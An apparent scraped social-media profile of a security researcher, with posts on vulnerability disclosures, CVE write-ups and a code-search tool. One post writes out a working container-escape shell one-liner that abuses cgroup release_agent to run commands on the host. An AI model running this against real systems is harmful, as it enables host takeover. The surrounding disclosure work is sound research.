user avatar
Felix Wilhelm
@_fel1x
Co-founder and CTO of @asymmetric_re
Joined November 2010
Posts
  • Pinned
    user avatar
    I’ve started a new security company together with @claudijd: Asymmetric Research (@asymmetric_re / asymmetric.re ). If you are a strong security engineer or researcher interested in defending and breaking some of the biggest DeFI and Blockchain projects, we’d love to
  • user avatar
    I stumbled upon a fun heap overflow in Github's markdown rendering library. RCE via a malicious README 🤔 Demonstrates the risk of memory unsafe dependencies used by scripting languages. github.com/github/cmark-g…
  • user avatar
    You might want to update your F5 Big IP appliances: support.f5.com/csp/article/K0…. bugs.chromium.org/p/project-zero… and bugs.chromium.org/p/project-zero… are two data-plane bugs that got fixed.
  • user avatar
    Slides for my SAML talk at @hexacon_fr are now online: drive.google.com/file/d/1p1tTTI…. Includes details of CVE-2022-34169, a fun JIT bug that you should check out.
  • user avatar
    My writeup for the haproxy http2 bug (CVE-2020-11100) is now public: bugs.chromium.org/p/project-zero…. Includes a PoC exploit to demonstrate RCE against Ubuntu 19.10.
  • user avatar
    My report for this bug is now public: bugs.chromium.org/p/project-zero…. Thanks @github for donating a 40000$ bounty to Médecins Sans Frontières (msf.org)
    I stumbled upon a fun heap overflow in Github's markdown rendering library. RCE via a malicious README 🤔 Demonstrates the risk of memory unsafe dependencies used by scripting languages. github.com/github/cmark-g…
  • user avatar
    CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: access.redhat.com/security/vulne…. Exploit fits in a tweet so you should patch as soon as possible.
  • user avatar
    Enter the Vault: Authentication Issues in HashiCorp Vault
  • user avatar
    Happy to hear that Windows is secure again now that MS patched the last remaining bug in their unsandboxed, system-privileged JS runtime.
  • user avatar
    d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
  • user avatar
    An EPYC escape: Case-study of a KVM breakout
  • user avatar
    weggli, my attempt at writing a fast and robust semantic search tool for C and C++ code is now open source: github.com/googleprojectz…. Please take a look and let me know what you think.
    GIF
  • user avatar
    We found some interesting bugs in dnsmasq:
  • user avatar
    If you perform SAML auth in Java you should make sure you patched bugs.chromium.org/p/project-zero…. RCE during signature verification. Blogpost coming soon™.
user avatar
@_fel1x

See Felix Wilhelm’s full profile